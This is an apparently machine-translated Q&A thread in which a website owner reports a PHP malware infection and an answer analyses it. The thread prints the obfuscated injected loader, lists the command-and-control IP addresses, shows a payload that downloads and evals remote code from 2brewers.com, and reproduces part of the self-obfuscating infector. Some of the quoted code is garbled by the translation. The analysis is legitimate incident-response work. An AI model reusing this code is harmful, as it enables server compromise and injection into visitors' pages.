3

ここにこれを書くのはばかげているかもしれませんが、今のところ怖すぎます。私がiPageでホストしている2つのWebサイトがあります。

私の両方のWebサイトのすべてのPHPページは、今朝の午前9時頃に変更され、すべてに次のプレフィックスが付いています。

<?php /*db9fce8e7e3b4062309ef5d7c0193183_on*/ $TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH= array('1822','1839','1818','1829');$JN26Obrx7D= array('9042','9057','9044','9040','9059','9044','9038','9045','9060','9053','9042','9059','9048','9054','9053');$ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg= array('1379','1378','1396','1382','1335','1333','1376','1381','1382','1380','1392','1381','1382');$cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa2RXU0dKSWNHdFRSVEYyVTFkMGEySkhVa1pOVjJocFZqQldjRk14VG5OT01HeEVVVzB4YTFaNlZuRmFSV1J6WkcxS2NGRnVVbWxOYkVwdFYxUkpOV1JWZEVSVmJXeHJWakZzZDFwVVRrOU5SMDV6VDFoQ2FtSldXak5aYTJSSFlXeHdWRm95YkZGU01IQXlWMnRvY2tzd2JIQmtNbXhSVWpCd01sZHJhSEpMTUd4d1pESjBXbUpzV25SVVJVNVRZVzFLZFZWdFdtaFJNbk16V1Zaa1dsb3dkRVJWYlhCcFlteEtiVmxWVGtKUFZrSlVVVmhvVEZVd1NUTlRhMlJMVFZad2NGRlViRXBUUlRSM1dUSjNOV05IVG5SV2JtUnBVakJhY1Zkc1RtNWhWa0pJVTI1YVlWTkhjM0pUVjJ3ellWWkNTRk51V21GVFIzTnlVMWRzUW1SVmJFbFVha0pxWWxkNE0xbDZTalJoUjAxNVlVZDRhbVZYWkhKWFJFWlBVbXhXYzFkcldsWmlTRTV3VjJwSk5XUnNjRVJUYlZKTVZUTmtjbGRYTlZkaVZYUlZZekprYW1KV1dYZGFSbWhMWkZWc1JGVnRiR3RXTVdzeldteG9UMDFIVG5OUFdFSnFZbFphTTFsclpFZGhiSEJVV2pKc1VWRjZiSEJaYWtwVFRsWkNjRk5ZVGtwaGJtUXlWMWN3TldFeVZsVk9SMnhOVVRGS2NGcEdaRnBqTUhCSVZHNVdhMUpxYkhaVE1WSXdZMFp3Y0ZGWE9VdFNNRFV4V2tWWk5XSXdiRVZOUkd4S1VrVldkMU5WYUhwaE1XeDFWbTB4U2xKRVFtNVplazVUWlZabmVXSkliR0ZYUlVwNlYxWmtUMkpGZEVSVFZHaE5UV3R3TWxkcmFISkxNR3h3WlVod2ExTkZjSGRaTUdoUFl6RnNXVlJ0T1dGWFJURjJVMnRaTlZaR1NsZFRiR1JUVm10d2FWTlhNV3RrYlVsNVZWZHNXVlV5ZERGVFYzQXpaR3hzZEU5WGRHeFdSRkp3VkVWT1UyRlhVbGhYV0VKUVpWVktOVmRzYUZOTlYwNTBUa2RrUzFJd2IzaFhiWEF3VDFkT2RGWnFRbXRYUlhBeFUxVk9VMkZYVWxoWFZHUnRWakZ2ZUZsdE1VOU5SMFpZVDFoV1NsSjZiRE5YVm1NeFkyMUdWRm95ZEZwaWJGcDBVekZvZW1FeGIzcGpSMXBoVlRCRk5WTlZaR0ZoUjBwSlZHMTRVR1ZXU25aWFJFb3pXakZDVkZGdE9XRldNRnB5VjJ4b1MyVnNaM2xsU0VKcVRURkdkbE14VWpCalJuQndVVmM1YUZaNlZtMVhWbWhMWlZac1dXRXlPVXBoTURVeVdXMDFVMkpIU25WVldGSlRWbnBXY1ZscVNsTmpSMHAwV1hwYVNsSXlVVEpaVm1oQ1lWVjRSRkZYZEdoU2FteDZVekZPY2xveVZqVlJWM1JoVFROQ2JWZHNUa0pQVld4SlZXNXNhMVl4VlROYWJHUnpZbFZzUkZveWRHRk5NMEp0VjJ4T2MwNHdjRWxWYmxKcVVqRndNVmRXWTNoaVJXeEZUVWRrYTFJeFdqQlpNR014WVVkS1ZGb3liRTFOTVVvd1dUQk9TbU13YkVSVGEyUlZUVVJvY0ZNeFVqQmlWMFpZWlVkNFdVMHdTWGhhUlZrMVlXMUplVTVVUW1GV2VsVjNXVE5zYm1FeVVraE5XR1JoWWxSV2IxbHNaRlpqTUd4RVZXMXNhMVl4YkhkVU0yeFRUbXh3UkZGVWJFcFNNbEV5V1dwT1EySkhTbkJhTW5SclVucEdNMWR0TURGaFIwcFlWbGhPU2xFd2NEVlRWMnh5VGpCd1NGUnVXbWxpYkVweldXMDFVMlZyYkVWTlIyUmhUVE5DTlZkc1pFZGhNSFJFVldwYVlWRXpaRzVVVmxKQ1pEQXhSVkZZWkU1U1JVWjNWRE5zVTJGdFNYbE9WRUpoVm5wVmQxa3piRUpQVld4SVRWaGFZVkpxYkhGWmFra3dZakJ3U0ZSdVdtbGliRXB6V1cwMVUyVnJkRlZrUnpWc1lsVTFlbGxxVGs5aVJYUkVWV3BhWVZFeWN6TmFSbU14WXpKR1dFNVlTa3hSTVVsM1dXeG9RMkpYU25SU2JsSmhWVEp6TTFOclpFOWtiVXAxVlcxNGFXSnNTalpUVlZGM1dqRnZlbU5IZUdsaVZUVXlWMnRrVm1Jd2NFaFVibHBwWW14S2MxbHROVk5sYTNSVlpFUnNTbEl4V25wWmVrcFdXakpXTlZWdGNHbE5hbFYzVjJ4ak1VMUhUalZSVkd4S1VucEdNbGRyV1RWaGJVbDVUa2M1UzFJd2IzaFhiV3h5VGpKYVZGVnVUbUZXZWxKdVZVWk9RMlZ0VWtsVGJrNWhWbnBTZGxOclpFOWtiVXAxVlcxNGFXSnNTalpUTVZJd1lqRndXRkp0ZEdGWFJXeDJVMWQwVDJSdFNuVlZiWGhwWW14R01GWkZaRmRrVm05NlZXMDVVR0ZWUm5CVVIyeFRZekZ3V0U1SVFsQk5NSEJ6V2tWb1YyVlhTbkJhTW5SYVRXcHNNVnBGWkZka1YxSkpWRmhDVUUxNlFtNVhiVFZYWkZacmVsVnVRbWxOYWxKdVZXcEtWMDFHVWxoU2JsSmFWVEprZDFwWWJGTmtSMGw2VlcwNVlWZEZiRzVWUms1Q1lWZFJlbHBFVGsxaGJYTXhWMWN4YzAxSFRqVk9WM0JwVFdwQ2NGUjZUa3RpUjFKSlZtNXNhV0ZWUm5KWmJHTTFUVWRHU0ZadWJGQk5la1l5VjFkM05XVnRVa2hTYm14clVUSmtjRmxxVGtOaFIwcDBaRWhDU21GWGN6TlhiVFZYWkZacmVsVnVRbWxOYWxKdVYxWmtiMkpYVWxoVmJURnBVakZ2TWxkclpHOWlWMFpKVkZjNVMxTkZTbTlUTVdoNllUSktXRkp1VWxwVk1FVTFVMVZXYTJKSFVrWk5WMmhwVmpCV2RsTXhVbnBoTVhCMFlraE9ZVlV3UlRWVFZXaFhaVmRLU0ZadVZscE5hbXh5VjJ4T2IxcHNaM2RYYTNCVlVsWmFiVmRJYkhKT01rWllWMWRrVEZJeWVEWlpla3BYVFVWMFJGVnRXbFpOUmxwVVZtMTBWMVV4WkRWVGEyeFhVbXhLVWxkRVFtOVZSbFY0VlZkc1dWVXlkSGRhV0d4VFlqSkplbFJxUWtwU1JFSnVVMnRaTlZaR1NsZFRiR1JUVm10d2FWTlhkRzlXVmxwSFVXMWFWRkpVYkZWV2EwNUxXa1U0ZWsxSFpHRldNMmcyVjJ4T1EwNHdjRWhoU0ZwcVRURkdibFZHVGtKaFZXeHhaRVJzYUZZeGJHNVRNR1J6WlcxTmVWWnFRa3hSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3VkZWc1ZYaFZSbHBHVm0xYVVsWldTa1pXVjJ4TFdrVjBWR0pFWkV0U01uZ3pVMVZSZDFvd2NFZFBWbEpUVm10d1dGVnNXa3RaYTJ4elUydGFWVlpVYkZaVmJGazFVV3hLUmxWc1RrcGlSRUV6V214T1EySkhTa2xVYlhoS1UwaE9jbGxXYUVKYU1VSlVVVmRzU21GdVVUVlpWbVJhV2pCMFNHSkljR3BOYkZsM1V6Qk9VMXBzVlhkV2JFNVhZVEZhVkZZemJFdFRWbHBIVld4R1dVMVZjRWRWYlhSWFZURktWMU5YYkZsVk1uUjNXbGhzVTJWV2NGaFhWMlJSVlRCSmVGa3lNVFJpUjBwMFZHNWFZVkl4Vm5aVGExazFWa1pLVjFOc1pGTldhM0JwVTFkMGIxWldXa2RSYlZwV1lURmFTRlZzV2t0U2JGWndVMjFTVEZaSVVUVlRWV1JYWXpKTmVWWlhaR3hsVmtvMVYyeGtXbG94UWxSUlYyeEtZVzVSTlZsV1pGcGFNSFJJWWtod2FrMXNXWGRUTUU1VFdteFZkMVpzVGxkaE1WcFVWak5zUzFOV1drZFZiRVpaVFZaYVZWVnNXa3RhYkVaV1drVmFWV0pHUm5CWFJrNXlZMGRXTlZWcVJscFZNRVUxVTFWb1YyVlhTa2hXYmxaYVRXcHNjbGRzVG05bGJWSkpVMnBDYVUxdWFESmFSRXBYWlZWMFJGVnRXbFpOUmxwVVZtMTBWMVV4WkRWVGEyeFhVbXhLVWxkRVJsZFdSa3BYVTIxYVVsWlhVa2RXUjNoU1lWWm9WR0V6UWxCTmVrSnVWMnhrTkdWc2NGUlJhbVJMVTBaYWIxTlZVWGRhTUd4d1UxUmtiVll5ZUhSVFZVNXZZMGROZWxSdGVHdFJNbVJ5VjBSR1QxSnNWbk5YYTFwV1lraE9jRlpXV2xkU2JGWnpZa2RhVmsxV1NsUlZNVlV4VTBWc2MwMUlRa3hYU0U1eVdURm9UbG94UWxSUmFrWnFZbGhvYzFsdE1VOWtiSEJJVmxjNVMxSnFiRlZWYkZwTFZqRktWMU50U2twaVJWcFhWV3hhUzFkc1ozaFViRlpXWVRKNFVGVnViRXRhUlhSVlpFUnNTbEl4V25wWmVrcFdXakpXTlZWdWFHcGxWVVUxVTFWT1NtRlZPSHBOUjNSclYwVndlbGRJY0VKYU1VSlVVVmRzYUZOR1NYZFpNRkoyWkd0NE5WTlhaRTFoVlVaeVdUQmtSazR3Y0VsV2JteHBVbXBvTkZOVlVYZGFNR3h3VDFoR1lWWXhTbmRVUnpWRFlqSk9SVTlVU21GWFJYQTJXVlpqTldSV1FsVlJWRlpRVmtWV2RGbHNZelZOUjBaSVZtNXNVVlV3Ykc1VVIyeFRaRVpzV0UxWGFFcFJlbEp1VTFkc1lXSlhSbGhsUjNoUlZUQnNibFJIYkVKaE1YQjBZa2hPWVZVd1JqRlRWVTVLWWxkR1NFOVljR3RTUkVKd1UxVk5NRm93Y0VoaFNGcHFUVEZHYmxSSGJFSmhWWEIwWWtoa1VWVXdiRzVVUjJ4Q1lUSkdXVkZYWkUxaFZVWndVMjAxUzJKR2NIRk5SMnhLVVhwU2JsTnJhRXRpUm5Cd1VWaFdTbEV3YkhSYVJtUkdUMVZzY0ZGWVZrdFRSbHB2VTFWTk1Gb3diSEJYYm1ocVpXcENjRk5WVFRCYU1IQkpVbTV3VUdWV1NYZFpNalZ5V2pGQ1ZGRnFRbXBpYkZwelZIcEtjMkpWZEVSUmJURnJWbnBXY1ZwRlpITmtiVXB6VDFkNGJGSXllRFphUldoT1lqQnNkRlJxUm1waVdHaHRXVlpqTVdOSFVrUlRXRUpLVVRKM00xTnJaRTlpTUd4RlRVZGtXazB4V2pWWmExazFZMGRLZEdKRVFreFJNVWw0V1RJeE5GcHJNVVJSV0ZaS1VURkplRmt5TVRSYWF6RlVZWHBrV2sweFdqVlphMWsxWld4d1dWVnVXbXBUUmtaMlUydGtUMkl3ZUVSUmExSlhWbXR3VGxaRVJrTldWbWQ0VTJ0YVYxSnNXbFJXUjNoVFZURkdWazVXVWxOaE1WcFVWRVZPUW1WRmRGVmtSM0JyVjBWd2VsZEVUazlpUjFKSVQxaGthMUV5WkhKWFZFcHVZekJzUmxSc1dsWmhNMmhSVmxWYVUxcHNXa1ppUlRWVFZsUnNWMVpyVGpOYU1ERTFZWHBrUzFOR1ducGFSVTVDVDFWc1NWVnViR2hXZWtKMlYxUk9WMlZYU2tkUFYzaHNVakZhY1ZNd1RsTmhiVVpFWVROQ1VHVldTWGRaTWpWeVdqRkNWRkZ0TVZwV00yZzJWMnhTTUU5VmJFaGlSekZLVVRKa2RsbFdZekZqUm1kNVdrZDRhMUV5WkhCWFZtUTBZekpKZWxwSFdtdFhSWEI2VjBSS1lXUnRUa2hXYmxaS1lWZDBkMU5WVGxwaVZXeEVWV3BDYW1KdGRIZFRWV2g2WVRKU1dHVkVRa3BTUkVKdVdrVm9TMk5IU2xSaFJVWmhZbGQ0ZWxkc1dUVmliSEJaVlcxYVdrMXFiREZhUldSWFpGZFNTVlJYT1V0VFJsbzFXV3RaTkdRd2JFUk9SMlJMVTBaYU5WbHJXVFJsUlhSVVlYcGtTMU5HU2pWYVZrNUNUMVZzU0ZkdGFHbFRSVFZ6VkhwTmVHTkdjSEJhTW5SclUwVnZNVk14YUhwaE1YQjFVVmRrVVZVd1NuUlpla2sxWVcxRmVVOVlaR0ZXZWxKMlUydG9RMkZGZUVSUlZGSk9VVE5rYmxOclpGZGxWMDUwVGxoYVRWRXdSbkpYYkdoTFpWZE5lbFZ1YkUxUk1FWTJWRlZPY2s0eVJsaFhWMlJNVVRGS2RGa3dUbkphTWxZMVZXNWFhMWRHUm01VlJrNUNZVlpKZDFac1ZrcFJNVWw0V1RJeE5GcHJNVlJSYTJ4WFVteEtVbFJJY0Vaa1ZURkhaVWhzV1ZKNlVuQlVNMnhUWkcxU1dWVlhaRTFoYWtKdVUxZDBiMlJ0VFhwVlZGcEtVVEZLTTFkV1dqUmxWbWhJVGtkc1VHVldTakphUm1oU1dqQjRjVTFIWkVwaE1EVXlXVzB3TVdKR2EzcFZia0pwVFdwUk1sTlZWazlqTWtsNlZHMTRXVk5GY0dwWmJYZzBaVlpvU0U1SGJGQk5iRzk2V1RJeGMwMUdjRlJhTW5SaFltdEdlbE5WVGxOa2JWSlpWVmhDVUdWV1NqVlhiR2hTV2pGQ1ZGRlhiRXBoYmxGNldWVmtjMk14Y0ZSUlZ6bEtWakZ3YzFscVNscGlNSEJJVjI1a1RGVXlkRzVhV0d4VFpWWndXVlZYWkVwUmVsRTFVMVZPUTJKV2IzbFdha0pxWlZka2NsZHROVUpqTUd4RlVsaHNVRkV5Y3pOYWJHUmhZVzFLU0U5WWNHRlZNbVJ5VjIwMVFtTkZPVFZWYWtacFUwWkdibFZHVGtOTlIwNTBZa2hTVEZORk5IaFhWelZQVFVkT2NGb3lkR3BpVmxsM1ZFVk9RMlZ0VWtsVGJtUnBUVEF4ZGxOcmFFdGlSMUpFWkRKa1NtSklhRFZYUldNeFdUSk9jMlZJVmtwaFYzUnVVek5zUWsxRmRGUmhlbVJ0VjBSQ2JsTlZaSE5pVld4RVlVaHdhMU5GY0ROWmFrNU9ZakJ3U1ZadVRtdFJNMlJ3VjJ4b1lXRkhTa1JUV0VKS1VUQlZOVlZHVGtOaVZteFlaVWh3WVZVeWR6TlRhMmgyV2pGQ1ZGRnVjR3RUUlhCM1dUQm9UMk14YkZsVWJUbGhWMFV4ZGxsNlRsTmxWbWQ2VTIxNGFsSXphRzlYVkVwV1lqQnNkRlpxU2xwV00yUndWRVZPU21GVmVFUlZha1pwVTBaR2QxTXhVbnBhTVhCWlYyMW9hVkV5WkhKYVYyeHlUakJzU0ZacVVtaFhSa1oyVXpGU01FOVhSbGhYVjJSTVUwVTBkMWt5TlVOa2JVNDFXakowYTFZelozZFVSVTVMWWtac2RFNVhhRXBoVjNSdVUxWlJkMDlWYkVoWGJXaHBVMFUxYzFNeGFIcGhNV2Q0Vkd0YVZtSkdjRWRXVjNoNllWWnZlVTlZV21GUk1IQnJVMVZSZDFveVRYcFZibXhaVFRCd2Mxa3daRFJoUm10NVZsYzVTbUpXV25CWmJURkdZVlY0UkZOWGJFMVJNVWw0V1d0b1VtTkZPSHBUYlhoclUwWmFOVmx0YkVOTlIwNTFWbTE0VUUxNlJuTlphMmhQWWtWc1NXUkliR0ZYUmtsNFdUSXdNRm94Y0hSU2JrNXFUV3hWTTFwc1ozZGhNWEIwVW1wQ2FGSXhXalZVVjNnd1drVnNSVTFIWkVwaGJVMHdWRWR3VWsxcmVIRlNWRTVPWlZSU05GUnJUa3BPTUhCSVYyMW9hMUl5YUhOWk1uQkxXV3hvVkZGVWJFcFJNR3cwVkc1d1dtUlZPVlJPU0d4T1ZrZGtNVlJXVW5KbFJXeHhZekowWVdKVldYZFpWV1JYWlZVeGMyUkhVa3BTUkVKdVUxZHdjbVZGZUhGVFdHeFFVWHBTTkZSc1VsSmtWVEZ4VmxSQ1NtRnVUbkpYYlRGSFRVZEdTRlp1YkU1aVNGSnJVMVZSZDFvd2JIRlplazVOWVcxa05GUkhjRXBOUlRGVVRraHNUMVpGTVhCVU0yeFRZbFpzV1ZWdE9XRlhSV3cxVm5wRmQxb3hRbFJSVjJ4T1ZrZGpkMVJIY0c1bFZYaHhVbGhvVDJWVVVqUlVWbEpDWVZVNU5WVnRNVnBYUmtwMlYyeG9TbVZXWTNoTlIyUlJWVEJHY0ZSclVscGtWVFZFVGtoc1RsSkZiREZVTVZKT1lWVTVOVlZ0TVZwWFJrcDJWMnhvU21WV1kzaE5SMlJSVlRCR2NGUnJVbHBrVlRGeFZWUldUV0ZzVlRCVVIzQkdaV3MxVkZOVVpFdFNNWEJ2V2tWa2IySkhUbkZUYlVwWlZUQkZOVk5WVGtwbFJUVTJWMWhXVUZWNlVqVlVhMUpHWkZVeFZWWllaRXBoYms1eVYyMHhSMDFIUmtoV2JteE9Za2hTYTFOVlVYZGFNR3h4VlZSS1RXRnJNSHBVUjNCR1RXczVWRTVFUms5aFZXc3pVMnRrWVdGSFVraGhSM2hxWVd0d2FWZEdUa0pQVld4RVUxUkNUMkZVVWpaVVZVMHdUVVV4VkU1RVZsQlZNR3N6VTJ0a1lXRkhVa2hoUjNocVlXdHdhVmRHVGtKUFZXeEVVMVJXVDFGNlVqVlVhMUpLWkZVeGNWWlVSazFoYXpCNFUxZHdlbUV4Y0hSU2FrSm9VakZhTlZSWGVEQmFSV3hGVFVka1NtRnJWWHBVTUUwd1pVVTFjVk5ZVms1V1JXc3hWRWR3U21WVk1UVlRWR1JMVWpGd2IxcEZaRzlpUjA1eFUyMUtXVlV3UlRWVFZVNUtUVEE1UkU1RVFrOWxWRkkwVkRCU1VtUlZNVFpVVjJ4UVpWWktkRmRXYUZOaU1YQlpVMWhzV0UxVVFtNVZSazVDWVZVeE5sSllWazVXUjJOM1ZFZHdTbVZyTlVST1JGWlBZVlZyTTFsNlNtOU5WbkIwVjI1T1lWVXlaSEpYYlRGSFRVZEdTRlp1YkU1aFYzTXpWMjB3TldWV2NGaFNiWEJvVVRKa2NsZHRNVWROUjBaSVZtNXNUbUZWU205Wk0yeENZVEpTV1ZOWVFteE5iWGgwVTFWT2Jsb3hiRmhoUnpGclZqRktkRmxyWkdGT2JIQklZVWN4YUZORk1YWlRhMmhYWlZWMFZGRllRa3BUU0U1dVYxYzFTMkpHYkZoak1tUlFUWHBGTlZwc1JUbFFVMGx3UzFSelp5SXBLVHNnIikpOyA=";if (!function_exists("IOvqWhUNav1vXbeu")){ function IOvqWhUNav1vXbeu($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU,$iPKwKwD9uDGAJlgUcL87){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW = '';foreach($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU as $vwdHH9YC8Qv5SkhOG4ZoO9){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW .= chr($vwdHH9YC8Qv5SkhOG4ZoO9 - $iPKwKwD9uDGAJlgUcL87);}return $pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW;}$NfcYRc72PjdDxDTcZ9Y6 = IOvqWhUNav1vXbeu($TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH,1721);$c6gts3vwnaRtcGbfD4VN7obA8 = IOvqWhUNav1vXbeu($JN26Obrx7D,8943);$n82mSuiYNAS8X68E = IOvqWhUNav1vXbeu($ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg,1281);$TargEl = $c6gts3vwnaRtcGbfD4VN7obA8('$bigiJelZcd',$NfcYRc72PjdDxDTcZ9Y6.'('.$n82mSuiYNAS8X68E.'($bigiJelZcd));');$TargEl($cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K);} /*db9fce8e7e3b4062309ef5d7c0193183_off*/ ?>

iPageのサポートに連絡しようとしましたが、何が起こったのかわかりません。彼らは私のためにサポートチケットを作成しました。これは48時間以内に調べられます!!

アップデート

ハッキングについてのメールを受け取りました

差出人:貧しい犠牲者hahahaha@gmail.com

メッセージ:サーバーにこのコードがあるのはなぜですか?なぜ私のファイルをハッキングしているのですか?このコードはあなたを指し示しています!!! 訴訟の準備をする

if(!function_exists( "GetMama")){function mod_con($ buf){str_ireplace( ""、 ""、$ buf、$ cnt_h); if($ cnt_h == 1){$ buf = str_ireplace( ""、 "" .stripslashes($ _ SERVER ["good"])、$ buf); $bufを返します。} str_ireplace( ""、 ""、$ buf、$ cnt_h); if($ cnt_h == 1){$ buf = str_ireplace( ""、stripslashes($ _ SERVER ["good"])。 ""、$ buf) ; $bufを返します。} return $ buf; } function opanki($ buf){$ gz_e = false; $ h_l = headers_list(); if(in_array( "Content-Encoding:gzip"、$ h_l)){$ gz_e = true; } if($ gz_e){$ tmpfname = tempnam( "/ tmp"、 "FOO"); file_put_contents($ tmpfname、$ buf); $ zd = gzopen($ tmpfname、 "r"); $ contents = gzread($ zd、10000000); $ contents = mod_con($ contents); gzclose($ zd); unlink($ tmpfname); $ contents = gzencode($ contents); } else {$ contents = mod_con($ buf); } $ len = strlen($ contents); header( "Content-Length:"。$ len); return($ contents); } function GetMama(){$ mother = "www.99bits.com"; return $ mother; } ob_start( "opanki"); function ahfudflfzdhfhs($ pa){$ mama = GetMama(); $ file = urlencode(ファイル); if(isset($ _ SERVER ["HTTP_HOST"])){$ host = $ _SERVER ["HTTP_HOST"]; } else {$ host = ""; } if(isset($ _ SERVER ["REMOTE_ADDR"])){$ ip = $ _SERVER ["REMOTE_ADDR"]; } else {$ ip = ""; } if(isset($ _ SERVER ["HTTP_REFERER"])){$ ref = urlencode($ _ SERVER ["HTTP_REFERER"]); } else {$ ref = ""; } if(isset($ _ SERVER ["HTTP_USER_AGENT"])){$ ua = urlencode(strtolower($ _ SERVER ["HTTP_USER_AGENT"])); } else {$ ua = ""; } if(isset($ _ SERVER ["QUERY_STRING"])){$ qs = urlencode($ _ SERVER ["QUERY_STRING"]); } else {$ qs = ""; } $ url_0 = "http://"。$ pa; $ url_1 ="/jedi.php?version=0991&mother="。$mama。"&file="。$file。"&host="。$host。"&foreach($ Father2 as $ ur){if(ahfudflfzdhfhs($ ur)){break; }}}

送信元(ipアドレス):64.118.163.18(64.118.163.18)日時:2012年4月9日19:15送信元(リファラー): http ://www.99bits.com/contact-us/使用(ユーザーエージェント):Mozilla / 5.0(Macintosh; Intel Mac OS X 10_7_3)AppleWebKit / 535.19(KHTML、Geckoなど)Chrome / 18.0.1025.151 Safari / 535.19

すべての助けと知識を提供してくれた皆さんに感謝します。奇妙で未知の理由で、私のブログがこのハッキングの試みの標的にされました。すべてのファイルをクリーンアップできるようになるまで(すべてのPHPファイルが感染しているため)、当面の間ブログを閉じました。

4

4 に答える 4

7

現在の形式では、スクリプトには次のコマンドアンドコントロールサーバー( "c&c")があります。

$father2[] = "78.46.173.14";
$father2[] = "176.9.218.191";
$father2[] = "91.228.154.254";
$father2[] = "77.81.241.253";
$father2[] = "184.82.117.110";
$father2[] = "46.4.202.93";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "46.30.41.99";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "78.47.184.33";
$father2[] = "31.184.234.96";

スクリプトは、実行ごとにそれらの順序をランダム化します。次に、これらの変数を含むGETリクエストを送信しようとします

$_SERVER["HTTP_HOST"]
$_SERVER["REMOTE_ADDR"]
$_SERVER["HTTP_REFERER"]
$_SERVER["HTTP_USER_AGENT"]
$_SERVER["QUERY_STRING"]
__FILE__

最初のc&cサーバーに対して、応答に含まれていない場合、evalまたはebna(またはサーバーがダウンしている場合)、次のc&cサーバーを試行します。

c&cサーバーが次を返す場合:ebna <somestring><somestring>はWebサイトのbodyタグ内に配置されます。したがって、ハッカーは任意のhtml/jsコードを挿入できます。

c&cサーバーが返す他のケースではeval <somestring><somestring>はeval()に渡されます。そうすれば、ハッカーは任意のphpコードを実行することさえできます。

次のように、すべてのurlパラメータを省略するだけで、c&cサーバーにeval応答を返すことができましhttp://<server-ip>/jedi.phpた。応答は次のとおりです。

eval $try = true;
if (function_exists("curl_init")) {
    $ch = curl_init('http://2brewers.com/99.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    $ult = trim(curl_exec($ch));
    $try = false;
}
if ((ini_get('allow_url_fopen')) && $try) {
    $ult = trim(@file_get_contents('http://2brewers.com/99.txt'));
    $try = false;
}
if ($try) {
    $fp = fsockopen('2brewers.com', 80, $errno, $errstr, 30);
    if ($fp) {
        $out = "GET /99.txt HTTP/1.0\r\n";
        $out. = "Host: 2brewers.com\r\n";
        $out. = "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        $ret = '';
        while (!feof($fp)) {
            $ret. = fgets($fp, 128);
        }
        fclose($fp);
        $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
    }
}
$xx = 'ev'.'al';
$_FILE = create_function('$_', $xx.'($_);');
$_FILE($ult);

ロードして実行しますhttp://2brewers.com/99.txt。これは次のようになります。

function get_file_extension($file_name) {
    return substr(strrchr($file_name, '.'), 1);
}

function pass_gen($dol) {
    $source[0] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $source[1] = "0123456789";
    $length = rand(5, 50);
    $passwordlen = intval($length) - 1;
    $use = implode("", $source);
    $max_num = strlen($use) - 1;
    $rp = '';
    for ($i = 0; $i < $passwordlen; $i++) {
        $x = rand(0, $max_num);
        $rp. = $use[$x];
    }
    if ($dol) {
        return '$'.$source[0][rand(0, strlen($source[0]) - 1)].$rp;
    } else {
        return $source[0][rand(0, strlen($source[0]) - 1)].$rp;

    }
}

function GetMass($text, $code, $massname) {
    $a = str_split($text);
    foreach($a as $b) {
        $evmas[] = ord($b) + $code;
    }
    $z = $massname."= array('".implode("','", $evmas)."');";
    return $z;
}


function Codee($code) {


    $coo = 'if (!function_exists("F1")){ function F1($v6,$v7){$v8 = \'\';foreach($v6 as $v9){$v8 .= chr($v9 - $v7);}return $v8;}$v1 = F1($mas1,$code1);$v2 = F1($mas2,$code2);$v3 = F1($mas3,$code3);$v4 = $v2(\'$v5\',$v1.\'(\'.$v3.\'($v5));\');$v4($v0);}';

    $f1 = pass_gen(false);
    $coo = str_replace('F1', $f1, $coo);
    $v1 = pass_gen(true);
    $coo = str_replace('$v1', $v1, $coo);
    $v2 = pass_gen(true);
    $coo = str_replace('$v2', $v2, $coo);
    $v3 = pass_gen(true);
    $coo = str_replace('$v3', $v3, $coo);
    $v4 = pass_gen(true);
    $coo = str_replace('$v4', $v4, $coo);
    $v5 = pass_gen(true);
    $coo = str_replace('$v5', $v5, $coo);
    $v6 = pass_gen(true);
    $coo = str_replace('$v6', $v6, $coo);
    $v7 = pass_gen(true);
    $coo = str_replace('$v7', $v7, $coo);
    $v8 = pass_gen(true);
    $coo = str_replace('$v8', $v8, $coo);
    $v9 = pass_gen(true);
    $coo = str_replace('$v9', $v9, $coo);
    $v0 = pass_gen(true);
    $coo = str_replace('$v0', $v0, $coo);
    $mas1 = pass_gen(true);
    $coo = str_replace('$mas1', $mas1, $coo);
    $mas2 = pass_gen(true);
    $coo = str_replace('$mas2', $mas2, $coo);
    $mas3 = pass_gen(true);
    $coo = str_replace('$mas3', $mas3, $coo);
    $code1 = rand(1000, 10000);
    $coo = str_replace('$code1', $code1, $coo);
    $code2 = rand(1000, 10000);
    $coo = str_replace('$code2', $code2, $coo);
    $code3 = rand(1000, 10000);
    $coo = str_replace('$code3', $code3, $coo);

    for ($i = 0; $i < 3; $i++) {
        $code = base64_encode($code);
        $code = 'eval(base64_decode("'.$code.'")); ';
    }
    $code = base64_encode($code);


    $z = GetMass('eval', $code1, $mas1);
    $z. = GetMass('create_function', $code2, $mas2);
    $z. = GetMass('base64_decode', $code3, $mas3);
    $z. = $v0.'="'.$code.'";';
    $z. = $coo;
    return $z;

}

function modify($fname) {


    $tmp = file_get_contents($fname);
    $md_start = md5($tmp);

    chmod($fname, 0666);
    $md = md5($fname);



    $pattern = '/function GetMama\(\).*\]\}\)\)\{break;\}\}/i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/\/\*god_mode_on.*god_mode_off\*\//i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/\/\*'.$md.'_on.*'.$md.'_off\*\//i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/<\?php[\s]*\?>/i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pos = strpos($tmp, 'GetMama');
    $pos2 = strpos($tmp, 'god_mode_on');
